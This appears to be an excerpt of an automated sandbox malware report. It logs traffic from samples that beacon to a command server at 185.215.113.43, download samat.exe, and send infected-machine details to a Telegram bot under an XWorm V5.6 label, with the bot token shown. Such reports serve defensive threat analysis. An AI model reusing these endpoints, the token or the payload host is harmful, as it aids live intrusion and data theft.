Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 23.57.90.111 23.57.90.111
Source: Joe Sandbox View	IP Address: 152.195.19.97 152.195.19.97

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50337 -> 20.189.173.5:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50147 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 188.165.52.14:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43

Source: global traffic	HTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.0af827ee54246cc151b3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.b23f2c737ccf14018cf8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732828390&P2=404&P3=2&P4=AWOCGn%2f5q6RNxVS7%2fjhSYDCixRz%2bmQY0jaYBCPiSYbzX2yFPRgPPwARFz4cZHf%2fElpV3Q%2fz95o15ZDniXBTs1g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: X9nsUlIue40Lh2xDAXDu2pSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1732223700869&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=4a15e35cafd94d159c0b19139d533c19&activityId=4a15e35cafd94d159c0b19139d533c19&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=13B8460915C043F29EE15DCA68DCD589&MUID=00AA082B214465520B5C1D15206D642A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=00AA082B214465520B5C1D15206D642A; _EDGE_S=F=1&SID=1E0A64B8A5A8631F16D67186A4B1627A; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: - https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: d- https://www.facebook.com/groups/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: thedotmediagroup.com
Source: global traffic	DNS traffic detected: DNS query: api.myip.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php58
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php=
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpA
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpca-11ee-8c18-806e6f6e699
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.dig
Source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
